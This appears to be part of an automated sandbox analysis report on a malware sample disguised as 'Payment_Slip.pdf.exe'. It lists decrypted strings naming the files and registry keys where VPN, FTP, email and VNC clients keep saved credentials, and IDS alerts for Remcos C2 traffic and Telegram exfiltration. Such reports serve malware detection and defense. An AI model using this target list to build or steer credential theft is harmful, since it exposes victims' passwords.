Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: username
Source: 12.0.host.exe.240000.0.unpack	String decryptor: auth-data
Source: 12.0.host.exe.240000.0.unpack	String decryptor: entropy
Source: 12.0.host.exe.240000.0.unpack	String decryptor: USERPROFILE
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \OpenVPN\config\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: remote
Source: 12.0.host.exe.240000.0.unpack	String decryptor: remote
Source: 12.0.host.exe.240000.0.unpack	String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack	String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack	String decryptor: NordVpn.exe*
Source: 12.0.host.exe.240000.0.unpack	String decryptor: user.config
Source: 12.0.host.exe.240000.0.unpack	String decryptor: //setting[@name='Username']/value
Source: 12.0.host.exe.240000.0.unpack	String decryptor: //setting[@name='Password']/value
Source: 12.0.host.exe.240000.0.unpack	String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Private Internet Access
Source: 12.0.host.exe.240000.0.unpack	String decryptor: %ProgramW6432%
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Private Internet Access\data
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Private Internet Access\data
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \account.json
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ."username":"(.?)"
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ."password":"(.?)"
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Private Internet Access
Source: 12.0.host.exe.240000.0.unpack	String decryptor: privateinternetaccess.com
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FileZilla
Source: 12.0.host.exe.240000.0.unpack	String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 12.0.host.exe.240000.0.unpack	String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Server>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Host>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Host>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </Host>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Port>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </Port>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <User>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <User>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </User>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </Pass>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Pass>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </Pass>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: CoreFTP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 12.0.host.exe.240000.0.unpack	String decryptor: User
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Host
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Port
Source: 12.0.host.exe.240000.0.unpack	String decryptor: hdfzpysvpzimorhk
Source: 12.0.host.exe.240000.0.unpack	String decryptor: WinSCP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HostName
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UserName
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PublicKeyFile
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PortNumber
Source: 12.0.host.exe.240000.0.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 12.0.host.exe.240000.0.unpack	String decryptor: WinSCP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ABCDEF
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Flash FXP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: port
Source: 12.0.host.exe.240000.0.unpack	String decryptor: user
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pass
Source: 12.0.host.exe.240000.0.unpack	String decryptor: quick.dat
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Sites.dat
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \FlashFXP\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \FlashFXP\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FTP Navigator
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: No Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: User
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SmartFTP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 12.0.host.exe.240000.0.unpack	String decryptor: WS_FTP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HOST
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PWD=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PWD=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FtpCommander
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \cftp\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;Password=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;User=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;Server=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;Port=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;Port=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;Password=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;User=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ;Anonymous=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FTPGetter
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \FTPGetter\servers.xml
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_ip>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_ip>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </server_ip>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_port>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </server_port>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_user_name>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_user_name>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </server_user_name>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_user_password>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <server_user_password>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </server_user_password>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FTPGetter
Source: 12.0.host.exe.240000.0.unpack	String decryptor: The Bat!
Source: 12.0.host.exe.240000.0.unpack	String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \The Bat!
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Account.CFN
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Account.CFN
Source: 12.0.host.exe.240000.0.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Becky!
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 12.0.host.exe.240000.0.unpack	String decryptor: DataDir
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Folder.lst
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Mailbox.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PassWd
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SMTPServer
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack	String decryptor: MailAddress
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Becky!
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Outlook
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IMAP Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: POP3 Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HTTP Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SMTP Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IMAP Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: POP3 Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HTTP Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SMTP Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Mail App
Source: 12.0.host.exe.240000.0.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SchemaId
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pResourceElement
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pIdentityElement
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pPackageSid
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pAuthenticatorElement
Source: 12.0.host.exe.240000.0.unpack	String decryptor: syncpassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: mailoutgoing
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FoxMail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Executable
Source: 12.0.host.exe.240000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 12.0.host.exe.240000.0.unpack	String decryptor: FoxmailPath
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Storage\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Storage\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Account.stg
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Account.stg
Source: 12.0.host.exe.240000.0.unpack	String decryptor: POP3Host
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SMTPHost
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IncomingServer
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack	String decryptor: MailAddress
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: POP3Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Opera Mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 12.0.host.exe.240000.0.unpack	String decryptor: opera:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PocoMail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Pocomail\accounts.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: POPPass
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SMTPPass
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SMTP
Source: 12.0.host.exe.240000.0.unpack	String decryptor: eM Client
Source: 12.0.host.exe.240000.0.unpack	String decryptor: eM Client\accounts.dat
Source: 12.0.host.exe.240000.0.unpack	String decryptor: eM Client
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack	String decryptor: "Username":"
Source: 12.0.host.exe.240000.0.unpack	String decryptor: "Secret":"
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 12.0.host.exe.240000.0.unpack	String decryptor: "ProviderName":"
Source: 12.0.host.exe.240000.0.unpack	String decryptor: o6806642kbM7c5
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Mailbird
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SenderIdentities
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Server_Host
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Username
Source: 12.0.host.exe.240000.0.unpack	String decryptor: EncryptedPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Mailbird
Source: 12.0.host.exe.240000.0.unpack	String decryptor: RealVNC 4.x
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: RealVNC 3.x
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: RealVNC 4.x
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: RealVNC 3.x
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\ORL\WinVNC3
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: TightVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: TightVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PasswordViewOnly
Source: 12.0.host.exe.240000.0.unpack	String decryptor: TightVNC ControlPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ControlPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: TigerVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\TigerVNC\Server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack	String decryptor: JDownloader 2.0

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	11_2_004315EC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,	14_2_00404423
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	17_2_004315EC

Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_0cda5b99-4

Source: Payment_Slip.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2

Source: Payment_Slip.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041A01B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040B28E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0040838E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_004087A0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_00407848
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004068CD FindFirstFileW,FindNextFileW,	11_2_004068CD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0044BA59 FindFirstFileExA,	11_2_0044BA59
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00417AAB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040AC78
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,	14_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407C87
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_0041A01B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	17_2_0040B28E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_0040838E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_004087A0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00407848
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004068CD FindFirstFileW,FindNextFileW,	17_2_004068CD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0044BA59 FindFirstFileExA,	17_2_0044BA59
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_00417AAB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040AC78

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00406D28

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 4x nop then jmp 09617E79h		0_2_0961865C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 4x nop then jmp 076D7009h		7_2_076D77EC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49720 -> 103.186.117.228:9373
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49724 -> 103.186.117.228:9373
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49722 -> 103.186.117.228:9373
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49725 -> 103.186.117.228:9373
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49721 -> 103.186.117.228:9373
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49723 -> 103.186.117.228:9373
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49755 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49771 -> 149.154.167.220:443
